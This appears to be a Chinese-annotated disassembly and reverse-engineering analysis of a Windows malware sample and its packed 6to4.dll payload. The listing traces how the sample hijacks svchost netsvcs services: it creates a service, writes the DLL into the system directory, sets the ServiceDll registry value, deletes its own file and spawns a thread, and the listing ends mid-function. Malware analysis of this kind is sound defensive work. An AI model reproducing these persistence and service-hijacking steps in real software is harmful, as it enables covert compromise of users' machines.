0040115B FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
00401161 6A 01 push 1
00401163 E8 75030000 call 004014DD
00401168 EB 12 jmp short 0040117C
0040116A FF75 E4 push dword ptr [ebp-1C] ; 删除服务
0040116D FF15 2C204000 call dword ptr [40202C] ; ADVAPI32.DeleteService
00401173 FF75 E4 push dword ptr [ebp-1C]
00401176 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
0040117C 8D85 B0F9FFFF lea eax, dword ptr [ebp-650] ; isdelfilecevent(ebp-18)不是一
00401182 8945 FC mov dword ptr [ebp-4], eax ; netsvcs
00401185 8B45 FC mov eax, dword ptr [ebp-4] ; 取得netsvcs的四个字节数据
00401188 0FBE00 movsx eax, byte ptr [eax]
0040118B 85C0 test eax, eax
0040118D 0F84 92010000 je 00401325 ; 判断第一个数据是否为零
00401193 6A 00 push 0
00401195 6A 00 push 0
00401197 6A 00 push 0
00401199 6A 00 push 0
0040119B 6A 00 push 0
0040119D 68 C8214000 push 004021C8 ; ASCII "%SystemRoot%\System32\svchost.exe -k netsvcs"
004011A2 6A 01 push 1
004011A4 6A 02 push 2
004011A6 6A 20 push 20
004011A8 6A 10 push 10
004011AA FF75 FC push dword ptr [ebp-4]
004011AD FF75 FC push dword ptr [ebp-4]
004011B0 FF75 F8 push dword ptr [ebp-8] ; 自己创建一个netsvcs服务
004011B3 FF15 04204000 call dword ptr [402004] ; ADVAPI32.CreateServiceA
004011B9 8945 E4 mov dword ptr [ebp-1C], eax
004011BC 837D E4 00 cmp dword ptr [ebp-1C], 0 ; hserv(ebp-1c)服务句柄
004011C0 0F84 3E010000 je 00401304
004011C6 68 04010000 push 104
004011CB 8D85 98F7FFFF lea eax, dword ptr [ebp-868] ; pdir(ebp-868)
004011D1 50 push eax ; 获得系统目录
004011D2 FF15 54204000 call dword ptr [402054] ; kernel32.GetSystemDirectoryA
004011D8 68 04010000 push 104
004011DD 6A 00 push 0
004011DF 8D85 A8F8FFFF lea eax, dword ptr [ebp-758]
004011E5 50 push eax
004011E6 E8 A90A0000 call 00401C94 ; jmp 到 MSVCRT.memset
004011EB 83C4 0C add esp, 0C
004011EE FF75 FC push dword ptr [ebp-4]
004011F1 8D85 98F7FFFF lea eax, dword ptr [ebp-868]
004011F7 50 push eax
004011F8 68 F8214000 push 004021F8 ; ASCII "%s\%s.dll"
004011FD 8D85 A8F8FFFF lea eax, dword ptr [ebp-758]
00401203 50 push eax ; str_sprintf(ebp-758)系统目录/6to4.dll
00401204 FF15 E0204000 call dword ptr [4020E0] ; USER32.wsprintfA
0040120A 83C4 10 add esp, 10
0040120D 8D85 A8F8FFFF lea eax, dword ptr [ebp-758]
00401213 50 push eax ; 在系统目录下创建6to4.dll
00401214 E8 10070000 call 00401929 ; create(str_sprintf)
00401219 85C0 test eax, eax
0040121B 75 0A jnz short 00401227
0040121D E9 E2000000 jmp 00401304
00401222 E9 DD000000 jmp 00401304
00401227 68 00040000 push 400 ; 创建成功
0040122C 6A 00 push 0
0040122E 8D85 98F3FFFF lea eax, dword ptr [ebp-C68] ; str_sprintf2(ebp-c68)systemcurentcontrolset/service/6to4
00401234 50 push eax
00401235 E8 5A0A0000 call 00401C94 ; jmp 到 MSVCRT.memset
0040123A 83C4 0C add esp, 0C
0040123D FF75 FC push dword ptr [ebp-4]
00401240 68 04224000 push 00402204 ; ASCII "SYSTEM\CurrentControlSet\Services\%s"
00401245 8D85 98F3FFFF lea eax, dword ptr [ebp-C68]
0040124B 50 push eax
0040124C FF15 E0204000 call dword ptr [4020E0] ; USER32.wsprintfA
00401252 83C4 0C add esp, 0C
00401255 8D85 A4F8FFFF lea eax, dword ptr [ebp-75C]
0040125B 50 push eax
0040125C 68 1F000200 push 2001F
00401261 6A 00 push 0
00401263 8D85 98F3FFFF lea eax, dword ptr [ebp-C68]
00401269 50 push eax
0040126A 68 02000080 push 80000002 ; 打开str_sprintf2(6to4服务的)键
0040126F FF15 1C204000 call dword ptr [40201C] ; ADVAPI32.RegOpenKeyExA
00401275 8D45 F4 lea eax, dword ptr [ebp-C]
00401278 50 push eax
00401279 8D85 A4F8FFFF lea eax, dword ptr [ebp-75C] ; hreg
0040127F 50 push eax
00401280 6A 00 push 0
00401282 68 3F000F00 push 0F003F
00401287 6A 00 push 0
00401289 6A 00 push 0
0040128B 6A 00 push 0
0040128D 68 2C224000 push 0040222C ; ASCII "Parameters"
00401292 FFB5 A4F8FFFF push dword ptr [ebp-75C] ; 创建参数选项
00401298 FF15 18204000 call dword ptr [402018] ; ADVAPI32.RegCreateKeyExA
0040129E 8D85 A8F8FFFF lea eax, dword ptr [ebp-758]
004012A4 50 push eax ; 查看系统目录/6to4.dll的长度
004012A5 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA
004012AB 50 push eax
004012AC 8D85 A8F8FFFF lea eax, dword ptr [ebp-758]
004012B2 50 push eax
004012B3 6A 02 push 2
004012B5 6A 00 push 0
004012B7 68 38224000 push 00402238 ; ASCII "ServiceDll"
004012BC FFB5 A4F8FFFF push dword ptr [ebp-75C] ; 服务动态链接库填写6to4.dll
004012C2 FF15 0C204000 call dword ptr [40200C] ; ADVAPI32.RegSetValueExA
004012C8 FFB5 A4F8FFFF push dword ptr [ebp-75C]
004012CE FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey
004012D4 6A 00 push 0
004012D6 6A 00 push 0
004012D8 FF75 E4 push dword ptr [ebp-1C] ; 开启服务
004012DB FF15 00204000 call dword ptr [402000] ; ADVAPI32.StartServiceA
004012E1 85C0 test eax, eax
004012E3 75 06 jnz short 004012EB
004012E5 EB 1D jmp short 00401304
004012E7 EB 1B jmp short 00401304
004012E9 EB 19 jmp short 00401304
004012EB FF75 E4 push dword ptr [ebp-1C]
004012EE FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
004012F4 FF75 F8 push dword ptr [ebp-8]
004012F7 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
004012FD 6A 01 push 1
004012FF E8 D9010000 call 004014DD ; 函数createdos(b)
00401304 FF75 E4 push dword ptr [ebp-1C]
00401307 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
0040130D FF75 FC push dword ptr [ebp-4] ; 6to4的长度
00401310 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA
00401316 8B4D FC mov ecx, dword ptr [ebp-4]
00401319 8D4401 01 lea eax, dword ptr [ecx+eax+1]
0040131D 8945 FC mov dword ptr [ebp-4], eax
00401320 ^ E9 60FEFFFF jmp 00401185
00401325 83A5 B4FDFFFF 0>and dword ptr [ebp-24C], 0
0040132C 83A5 94F3FFFF 0>and dword ptr [ebp-C6C], 0
00401333 EB 0D jmp short 00401342
00401335 8B85 94F3FFFF mov eax, dword ptr [ebp-C6C]
0040133B 40 inc eax
0040133C 8985 94F3FFFF mov dword ptr [ebp-C6C], eax
00401342 83BD 94F3FFFF 0>cmp dword ptr [ebp-C6C], 7
00401349 0F8D 78010000 jge 004014C7
0040134F 8B85 94F3FFFF mov eax, dword ptr [ebp-C6C]
00401355 FF3485 00304000 push dword ptr [eax*4+403000]
0040135C 8D85 60FFFFFF lea eax, dword ptr [ebp-A0]
00401362 50 push eax
00401363 FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA
00401369 8B85 94F3FFFF mov eax, dword ptr [ebp-C6C]
0040136F FF3485 1C304000 push dword ptr [eax*4+40301C]
00401376 8D85 B8FDFFFF lea eax, dword ptr [ebp-248]
0040137C 50 push eax
0040137D FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA
00401383 68 FF010F00 push 0F01FF
00401388 8D85 60FFFFFF lea eax, dword ptr [ebp-A0]
0040138E 50 push eax
0040138F FF75 F8 push dword ptr [ebp-8]
00401392 FF15 14204000 call dword ptr [402014] ; ADVAPI32.OpenServiceA
00401398 8945 E4 mov dword ptr [ebp-1C], eax
0040139B 837D E4 00 cmp dword ptr [ebp-1C], 0
0040139F 75 02 jnz short 004013A3
004013A1 ^ EB 92 jmp short 00401335
004013A3 6A 1C push 1C
004013A5 6A 00 push 0
004013A7 8D85 78F3FFFF lea eax, dword ptr [ebp-C88]
004013AD 50 push eax
004013AE E8 E1080000 call 00401C94 ; jmp 到 MSVCRT.memset
004013B3 83C4 0C add esp, 0C
004013B6 8D85 78F3FFFF lea eax, dword ptr [ebp-C88]
004013BC 50 push eax
004013BD FF75 E4 push dword ptr [ebp-1C]
004013C0 FF15 20204000 call dword ptr [402020] ; ADVAPI32.QueryServiceStatus
004013C6 83BD 7CF3FFFF 0>cmp dword ptr [ebp-C84], 1
004013CD 74 33 je short 00401402
004013CF 83BD B4FDFFFF 0>cmp dword ptr [ebp-24C], 0
004013D6 75 0A jnz short 004013E2
004013D8 E9 B9000000 jmp 00401496
004013DD E9 B4000000 jmp 00401496
004013E2 8D85 78F3FFFF lea eax, dword ptr [ebp-C88]
004013E8 50 push eax
004013E9 6A 01 push 1
004013EB FF75 E4 push dword ptr [ebp-1C]
004013EE FF15 28204000 call dword ptr [402028] ; ADVAPI32.ControlService
004013F4 85C0 test eax, eax
004013F6 75 0A jnz short 00401402
004013F8 E9 99000000 jmp 00401496
004013FD E9 94000000 jmp 00401496
00401402 68 04010000 push 104
00401407 6A 00 push 0
00401409 8D85 70F2FFFF lea eax, dword ptr [ebp-D90]
0040140F 50 push eax
00401410 E8 7F080000 call 00401C94 ; jmp 到 MSVCRT.memset
00401415 83C4 0C add esp, 0C
00401418 68 04010000 push 104
0040141D 8D85 70F2FFFF lea eax, dword ptr [ebp-D90]
00401423 50 push eax
00401424 FF15 54204000 call dword ptr [402054] ; kernel32.GetSystemDirectoryA
0040142A 68 44224000 push 00402244
0040142F 8D85 70F2FFFF lea eax, dword ptr [ebp-D90]
00401435 50 push eax
00401436 FF15 58204000 call dword ptr [402058] ; kernel32.lstrcatA
0040143C 8D85 B8FDFFFF lea eax, dword ptr [ebp-248]
00401442 50 push eax
00401443 8D85 70F2FFFF lea eax, dword ptr [ebp-D90]
00401449 50 push eax
0040144A FF15 58204000 call dword ptr [402058] ; kernel32.lstrcatA
00401450 8D85 70F2FFFF lea eax, dword ptr [ebp-D90]
00401456 50 push eax
00401457 E8 CD040000 call 00401929
0040145C 85C0 test eax, eax
0040145E 75 06 jnz short 00401466
00401460 EB 34 jmp short 00401496
00401462 EB 32 jmp short 00401496
00401464 EB 30 jmp short 00401496
00401466 6A 00 push 0
00401468 6A 00 push 0
0040146A FF75 E4 push dword ptr [ebp-1C]
0040146D FF15 00204000 call dword ptr [402000] ; ADVAPI32.StartServiceA
00401473 85C0 test eax, eax
00401475 75 06 jnz short 0040147D
00401477 EB 1D jmp short 00401496
00401479 EB 1B jmp short 00401496
0040147B EB 19 jmp short 00401496
0040147D FF75 E4 push dword ptr [ebp-1C]
00401480 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
00401486 FF75 F8 push dword ptr [ebp-8]
00401489 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
0040148F 6A 01 push 1
00401491 E8 47000000 call 004014DD
00401496 FF75 E4 push dword ptr [ebp-1C]
00401499 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
0040149F 83BD 94F3FFFF 0>cmp dword ptr [ebp-C6C], 6
004014A6 75 1A jnz short 004014C2
004014A8 83BD B4FDFFFF 0>cmp dword ptr [ebp-24C], 0
004014AF 75 11 jnz short 004014C2
004014B1 C785 B4FDFFFF 0>mov dword ptr [ebp-24C], 1
004014BB 838D 94F3FFFF F>or dword ptr [ebp-C6C], FFFFFFFF
004014C2 ^ E9 6EFEFFFF jmp 00401335
004014C7 FF75 F8 push dword ptr [ebp-8]
004014CA FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
004014D0 6A 00 push 0
004014D2 E8 06000000 call 004014DD
004014D7 33C0 xor eax, eax
004014D9 C9 leave
004014DA C2 1000 retn 10
主程序中定义的函数:
返回bool型变量,psubstr是数据返回的指针,返回的是当前路径和文件名,第一个空格以后的字符串,bool型变量指示,是否删除
psubstr文件及创建事件。
004016FF 55 push ebp ; 函数fcheckfile(psubstr)
00401700 8BEC mov ebp, esp
00401702 83EC 18 sub esp, 18 ; 分配18字节局部变量空间
00401705 8365 FC 00 and dword ptr [ebp-4], 0 ; ebp-4处清零,并取的命令行参数
00401709 FF15 44204000 call dword ptr [402044] ; kernel32.GetCommandLineA
0040170F 8945 E8 mov dword ptr [ebp-18], eax ; 取得了tem81的全路径地址存放在luj(ebp-18)处
00401712 6A 20 push 20
00401714 FF75 E8 push dword ptr [ebp-18] ; 查找字符20(空格)最后出现的位置
00401717 FF15 BC204000 call dword ptr [4020BC] ; MSVCRT.strrchr
0040171D 59 pop ecx ; 外部平衡堆栈
0040171E 59 pop ecx
0040171F 8945 F8 mov dword ptr [ebp-8], eax ; 把最后出现空格的指针给pspace(ebp-8)
00401722 837D F8 00 cmp dword ptr [ebp-8], 0
00401726 74 54 je short 0040177C ; 如果没有出现空格,跳转
00401728 8B45 F8 mov eax, dword ptr [ebp-8] ; 否则就把空格的指针pspace给eax
0040172B 40 inc eax ; eaxjia一,eax就指向了空格的下一个字符
0040172C 8945 F8 mov dword ptr [ebp-8], eax
0040172F FF75 F8 push dword ptr [ebp-8] ; p指向了空格的下一个字符,取得p字符的长度
00401732 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA
00401738 8945 F0 mov dword ptr [ebp-10], eax ; 把空格后面的长度给sublen(ebp-10)
0040173B 837D F0 01 cmp dword ptr [ebp-10], 1 ; 长度sublen小于等于1就跳转
0040173F 7E 0B jle short 0040174C
00401741 837D F0 07 cmp dword ptr [ebp-10], 7
00401745 7D 05 jge short 0040174C ; 大于等于7也跳转
00401747 E8 1CFFFFFF call 00401668
0040174C 837D F0 06 cmp dword ptr [ebp-10], 6 ; 长度小于1或大于7就执行这里
00401750 7E 2A jle short 0040177C ; 长度小于六就跳转
00401752 C745 FC 0100000>mov dword ptr [ebp-4], 1 ; 变量a(ebp-4)=1
00401759 FF75 F8 push dword ptr [ebp-8] ; 把空格后面的指针给进栈
0040175C FF75 08 push dword ptr [ebp+8] ; 函数的第一个参数psubstr进栈,把空格后面的字符写入第一参数地址处
0040175F FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA
00401765 68 80000000 push 80 ; 正常属性
0040176A FF75 08 push dword ptr [ebp+8] ; 设置psubstr指针指向的文件的安全属性为80
0040176D FF15 6C204000 call dword ptr [40206C] ; kernel32.SetFileAttributesA
00401773 FF75 08 push dword ptr [ebp+8] ; 压入文件名指针psubstr,删除psubstr文件
00401776 FF15 90204000 call dword ptr [402090] ; kernel32.DeleteFileA
0040177C 8365 F4 00 and dword ptr [ebp-C], 0 ; 变量hevent(ebp-c)清零
00401780 68 E0224000 push 004022E0 ; ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B"
00401785 6A 00 push 0 ; 事件的初始状态
00401787 6A 01 push 1 ; 是否手动设置受信
00401789 6A 00 push 0 ; 事件的安全性,创建事件
0040178B FF15 50204000 call dword ptr [402050] ; kernel32.CreateEventA
00401791 8945 F4 mov dword ptr [ebp-C], eax ; hevent=事件句柄
00401794 837D F4 00 cmp dword ptr [ebp-C], 0 ; 如果事件句柄为空,跳转
00401798 74 0D je short 004017A7
0040179A FF15 60204000 call dword ptr [402060] ; ntdll.RtlGetLastWin32Error
004017A0 3D B7000000 cmp eax, 0B7 ; 如果事件句柄hevent是不是空,判断最后错误是否是b7
004017A5 75 7A jnz short 00401821 ; 不是b7错误就跳到,关闭句柄
004017A7 837D F4 00 cmp dword ptr [ebp-C], 0 ; 是b7错误,hevent句柄再判断是否外为零
004017AB 74 09 je short 004017B6
004017AD FF75 F4 push dword ptr [ebp-C]
004017B0 FF15 88204000 call dword ptr [402088] ; kernel32.CloseHandle
004017B6 837D FC 00 cmp dword ptr [ebp-4], 0 ; 判断句柄是否为零
004017BA 75 14 jnz short 004017D0 ; 不为零就跳转
004017BC 833D 38304000 0>cmp dword ptr [403038], 1
004017C3 75 0B jnz short 004017D0
004017C5 6A 00 push 0
004017C7 E8 11FDFFFF call 004014DD
004017CC 33C0 xor eax, eax
004017CE EB 5D jmp short 0040182D
004017D0 8365 EC 00 and dword ptr [ebp-14], 0
004017D4 EB 07 jmp short 004017DD
004017D6 8B45 EC mov eax, dword ptr [ebp-14]
004017D9 40 inc eax
004017DA 8945 EC mov dword ptr [ebp-14], eax
004017DD 817D EC 9001000>cmp dword ptr [ebp-14], 190
004017E4 7D 3B jge short 00401821
004017E6 6A 32 push 32
004017E8 FF15 48204000 call dword ptr [402048] ; kernel32.Sleep
004017EE 8365 F4 00 and dword ptr [ebp-C], 0
004017F2 68 E0224000 push 004022E0 ; ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B"
004017F7 6A 00 push 0
004017F9 6A 01 push 1
004017FB 6A 00 push 0
004017FD FF15 50204000 call dword ptr [402050] ; kernel32.CreateEventA
00401803 8945 F4 mov dword ptr [ebp-C], eax
00401806 837D F4 00 cmp dword ptr [ebp-C], 0
0040180A 74 11 je short 0040181D
0040180C FF15 60204000 call dword ptr [402060] ; ntdll.RtlGetLastWin32Error
00401812 3D B7000000 cmp eax, 0B7
00401817 74 04 je short 0040181D
00401819 EB 06 jmp short 00401821
0040181B EB 02 jmp short 0040181F
0040181D ^ EB B7 jmp short 004017D6
0040181F ^ EB B5 jmp short 004017D6
00401821 FF75 F4 push dword ptr [ebp-C]
00401824 FF15 88204000 call dword ptr [402088] ; kernel32.CloseHandle
0040182A 8B45 FC mov eax, dword ptr [ebp-4]
0040182D C9 leave
0040182E C2 0400 retn 4 ; fcheckfile函数结束
函数openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符
pnetsvcs,输入的参数,svchost注册表netsvcs键的值:6to4 AppMgmt AudioSrv Browser CryptSvc DMServer DHCP ERSvc等等
psubspace,
pz,
00401B09 55 push ebp ; 调用函数openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符
00401B0A 8BEC mov ebp, esp
00401B0C 81EC 38040000 sub esp, 438
00401B12 8365 F4 00 and dword ptr [ebp-C], 0 ; ebp-c等于零
00401B16 8B45 08 mov eax, dword ptr [ebp+8] ; 取pnetsvcs
00401B19 8945 FC mov dword ptr [ebp-4], eax ; s_1(ebp-4)等于pnetsvcs
00401B1C EB 13 jmp short 00401B31
00401B1E FF75 FC push dword ptr [ebp-4]
00401B21 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA
00401B27 8B4D FC mov ecx, dword ptr [ebp-4]
00401B2A 8D4401 01 lea eax, dword ptr [ecx+eax+1]
00401B2E 8945 FC mov dword ptr [ebp-4], eax
00401B31 8B45 FC mov eax, dword ptr [ebp-4] ; 取得s_1(6to4字符串)
00401B34 0FBE00 movsx eax, byte ptr [eax] ; 取第一个字符
00401B37 85C0 test eax, eax ; 判断是否是零
00401B39 0F84 4E010000 je 00401C8D ; 如果是零跳转
00401B3F 83A5 ECFBFFFF 0>and dword ptr [ebp-414], 0 ; s_2handle(ebp-414)清零
00401B46 68 00040000 push 400
00401B4B 6A 00 push 0
00401B4D 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; s_sprintf(ebp-410)以后400字节清零
00401B53 50 push eax ; ebp-410后面400字节也清零
00401B54 E8 3B010000 call 00401C94 ; jmp 到 MSVCRT.memset
00401B59 83C4 0C add esp, 0C ; 平衡堆栈
00401B5C FF75 FC push dword ptr [ebp-4] ; 6toc字符地址
00401B5F 68 40234000 push 00402340 ; ASCII "SYSTEM\CurrentControlSet\Services\%s\Parameters"
00401B64 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 存储格式化后的字符地址
00401B6A 50 push eax ; system\currentcontrolset/services\6to4\parameters
00401B6B FF15 E0204000 call dword ptr [4020E0] ; USER32.wsprintfA
00401B71 83C4 0C add esp, 0C ; 平衡堆栈
00401B74 8D85 ECFBFFFF lea eax, dword ptr [ebp-414] ; 取得s_2(ebp-414)的地址
00401B7A 50 push eax ; 返回的句柄s_2handle = 0012EE08
00401B7B 6A 01 push 1 ; Access = KEY_QUERY_VALUE
00401B7D 6A 00 push 0 ; reserved=0
00401B7F 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 取得s_sprintf(ebp-410)的地址
00401B85 50 push eax ; Subkey = "SYSTEM\CurrentControlSet\Services\6to4\Parameters"
00401B86 68 02000080 push 80000002 ; hKey = HKEY_LOCAL_MACHINE
00401B8B FF15 1C204000 call dword ptr [40201C] ; ADVAPI32.RegOpenKeyExA
00401B91 85C0 test eax, eax ; 打开支持服务的dll注册选项
00401B93 0F85 EF000000 jnz 00401C88 ; 不等于零,则打开错误跳转
00401B99 68 00040000 push 400
00401B9E 6A 00 push 0
00401BA0 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 清空s——sprintf
00401BA6 50 push eax
00401BA7 E8 E8000000 call 00401C94 ; jmp 到 MSVCRT.memset
00401BAC 83C4 0C add esp, 0C
00401BAF C745 F8 0004000>mov dword ptr [ebp-8], 400 ; s_size(ebp-8)赋值400
00401BB6 8D45 F8 lea eax, dword ptr [ebp-8]
00401BB9 50 push eax
00401BBA 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; sprintf接受值当前的服务链接库
00401BC0 50 push eax
00401BC1 8D45 F0 lea eax, dword ptr [ebp-10] ; s_5valuetype(ebp-10)
00401BC4 50 push eax ; pValueType = 0012F20C
00401BC5 6A 00 push 0 ; Reserved = NULL
00401BC7 68 38224000 push 00402238 ; ValueName = "ServiceDll"
00401BCC FFB5 ECFBFFFF push dword ptr [ebp-414] ; s_2handle句柄,搜索服务当前的支持动态链接库
00401BD2 FF15 08204000 call dword ptr [402008] ; ADVAPI32.RegQueryValueExA
00401BD8 FF75 0C push dword ptr [ebp+C] ; 第二参数psubspace进栈
00401BDB 8D85 F0FBFFFF lea eax, dword ptr [ebp-410]
00401BE1 50 push eax ; sprintf接受值
00401BE2 FF15 64204000 call dword ptr [402064] ; kernel32.lstrcmpiA
00401BE8 85C0 test eax, eax
00401BEA 0F85 8C000000 jnz 00401C7C ; 如果psubspace和sprintf不一样跳转
00401BF0 FF75 FC push dword ptr [ebp-4] ; 如果一样,把这个服务名
00401BF3 FF75 10 push dword ptr [ebp+10] ; 把服务值赋给pz地址处
00401BF6 FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA
00401BFC 68 3F000F00 push 0F003F
00401C01 6A 00 push 0
00401C03 6A 00 push 0 ; 打开数据库连接
00401C05 FF15 24204000 call dword ptr [402024] ; ADVAPI32.OpenSCManagerA
00401C0B 8985 E8FBFFFF mov dword ptr [ebp-418], eax
00401C11 6A 20 push 20
00401C13 FF75 FC push dword ptr [ebp-4]
00401C16 FFB5 E8FBFFFF push dword ptr [ebp-418] ; 打开服务这个服务
00401C1C FF15 14204000 call dword ptr [402014] ; ADVAPI32.OpenServiceA
00401C22 8985 E4FBFFFF mov dword ptr [ebp-41C], eax ; hservice(ebp-41c)
00401C28 6A 1C push 1C
00401C2A 6A 00 push 0
00401C2C 8D85 C8FBFFFF lea eax, dword ptr [ebp-438]
00401C32 50 push eax
00401C33 E8 5C000000 call 00401C94 ; jmp 到 MSVCRT.memset
00401C38 83C4 0C add esp, 0C
00401C3B 8D85 C8FBFFFF lea eax, dword ptr [ebp-438]
00401C41 50 push eax
00401C42 6A 01 push 1
00401C44 FFB5 E4FBFFFF push dword ptr [ebp-41C]
00401C4A FF15 28204000 call dword ptr [402028] ; ADVAPI32.ControlService
00401C50 8945 F4 mov dword ptr [ebp-C], eax
00401C53 FFB5 E4FBFFFF push dword ptr [ebp-41C]
00401C59 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
00401C5F FFB5 E8FBFFFF push dword ptr [ebp-418]
00401C65 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
00401C6B FFB5 ECFBFFFF push dword ptr [ebp-414]
00401C71 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey
00401C77 8B45 F4 mov eax, dword ptr [ebp-C]
00401C7A EB 14 jmp short 00401C90
00401C7C FFB5 ECFBFFFF push dword ptr [ebp-414] ; 关闭打开的注册表
00401C82 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey
00401C88 ^ E9 91FEFFFF jmp 00401B1E ; 循环查找下一项注册表
00401C8D 8B45 F4 mov eax, dword ptr [ebp-C]
00401C90 C9 leave
00401C91 C2 0C00 retn 0C
create(文件名)函数,创建文件,
createdos函数,创建一个批处理文件,并执行,成功返回true。
6to4.dll文件:
6to4.dll文件也是upx加壳的,它的主程序入口是:10005D51
6to4.dll主程序,主要是在100032FD处f(x,y,z)函数中创建了线程线程,线程的过程函数在332a地址。
主程序的分析:
10005D51 55 push ebp ; 主程序入口
10005D52 8BEC mov ebp, esp
10005D54 53 push ebx ; 模块入口点
10005D55 8B5D 08 mov ebx, dword ptr [ebp+8] ; 参数x,6to4.10000000
10005D58 56 push esi
10005D59 8B75 0C mov esi, dword ptr [ebp+C] ; 参数y,输入参数个数
10005D5C 57 push edi
10005D5D 8B7D 10 mov edi, dword ptr [ebp+10] ; 参数z
10005D60 85F6 test esi, esi
10005D62 75 09 jnz short 10005D6D ; y!=0,跳转
10005D64 833D 10900010 0>cmp dword ptr [10009010], 0 ; 如果y==0,再比较【10009010】==0
10005D6B EB 26 jmp short 10005D93
10005D6D 83FE 01 cmp esi, 1 ; 如果y==1跳转
10005D70 74 05 je short 10005D77
10005D72 83FE 02 cmp esi, 2
10005D75 75 22 jnz short 10005D99
10005D77 A1 9C940010 mov eax, dword ptr [1000949C] ; y==1跳转到这里,判断【1000949c】是否为零
10005D7C 85C0 test eax, eax
10005D7E 74 09 je short 10005D89
10005D80 57 push edi
10005D81 56 push esi
10005D82 53 push ebx
10005D83 FFD0 call eax
10005D85 85C0 test eax, eax
10005D87 74 0C je short 10005D95 ; 为零就跳转
10005D89 57 push edi ; y==1,【1000949c】==零就跳到这里
10005D8A 56 push esi
10005D8B 53 push ebx
10005D8C E8 15FFFFFF call 10005CA6 ; 调用函数f1【4910】0(x,y,z),分配80的空间指针在9498处返回true
10005D91 85C0 test eax, eax
10005D93 75 04 jnz short 10005D99 ; 函数f1【4910】0(x,y,z)结果返回不是零跳转
10005D95 33C0 xor eax, eax
10005D97 EB 4E jmp short 10005DE7
10005D99 57 push edi
10005D9A 56 push esi
10005D9B 53 push ebx
10005D9C E8 5CD5FFFF call 100032FD ; 调用f(x,y,z)创建线程线程过程函数332a
10005DA1 83FE 01 cmp esi, 1
10005DA4 8945 0C mov dword ptr [ebp+C], eax ; 返回bool型变量,函数的第二个参数给为是否调用创建线程
10005DA7 75 0C jnz short 10005DB5
10005DA9 85C0 test eax, eax
10005DAB 75 37 jnz short 10005DE4 ; 返回f返回值不是零就跳转结束
10005DAD 57 push edi
10005DAE 50 push eax
10005DAF 53 push ebx
10005DB0 E8 F1FEFFFF call 10005CA6 ; 调用函数f1【4910】0(x,y,z)
10005DB5 85F6 test esi, esi
10005DB7 74 05 je short 10005DBE
10005DB9 83FE 03 cmp esi, 3
10005DBC 75 26 jnz short 10005DE4
10005DBE 57 push edi
10005DBF 56 push esi
10005DC0 53 push ebx
10005DC1 E8 E0FEFFFF call 10005CA6 ; 调用函数f1【4910】0(x,y,z)
10005DC6 85C0 test eax, eax
10005DC8 75 03 jnz short 10005DCD
10005DCA 2145 0C and dword ptr [ebp+C], eax
10005DCD 837D 0C 00 cmp dword ptr [ebp+C], 0
10005DD1 74 11 je short 10005DE4
10005DD3 A1 9C940010 mov eax, dword ptr [1000949C]
10005DD8 85C0 test eax, eax
10005DDA 74 08 je short 10005DE4
10005DDC 57 push edi
10005DDD 56 push esi
10005DDE 53 push ebx
10005DDF FFD0 call eax
10005DE1 8945 0C mov dword ptr [ebp+C], eax
10005DE4 8B45 0C mov eax, dword ptr [ebp+C]
10005DE7 5F pop edi
10005DE8 5E pop esi
10005DE9 5B pop ebx
10005DEA 5D pop ebp
10005DEB C2 0C00 retn 0C
f(x,y,z)函数,创建线程的分析:
100032FD 55 push ebp ; f(x,y,z)成功返回true,创建线程,过程函数332a
100032FE 8BEC mov ebp, esp
10003300 837D 0C 01 cmp dword ptr [ebp+C], 1 ; y==0?
10003304 75 1D jnz short 10003323 ; y不等于零就跳转
10003306 8B45 08 mov eax, dword ptr [ebp+8]
10003309 A3 7C940010 mov dword ptr [1000947C], eax ; 把x给【947c】
1000330E 6A 00 push 0
10003310 6A 00 push 0
10003312 6A 00 push 0
10003314 68 2A330010 push 1000332A ; ThreadFunction = 6to4.1000332A
10003319 6A 00 push 0 ; StackSize = 0
1000331B 6A 00 push 0 ; pSecurity = NULL
1000331D FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
10003323 33C0 xor eax, eax
10003325 40 inc eax
10003326 5D pop ebp
10003327 C2 0C00 retn 0C
在主程序中海还调用了的自定义函数f1【4910】0(x,y,z):
10005CA6 8B4424 08 mov eax, dword ptr [esp+8] ; 函数f1【4910】0(x,y,z)
10005CAA 85C0 test eax, eax
10005CAC 75 0E jnz short 10005CBC ; y不等于零就跳转
10005CAE 3905 10900010 cmp dword ptr [10009010], eax
10005CB4 7E 2E jle short 10005CE4
10005CB6 FF0D 10900010 dec dword ptr [10009010]
10005CBC 8B0D 90610010 mov ecx, dword ptr [10006190] ; MSVCRT._adjust_fdiv
10005CC2 83F8 01 cmp eax, 1
10005CC5 8B09 mov ecx, dword ptr [ecx]
10005CC7 890D 90940010 mov dword ptr [10009490], ecx
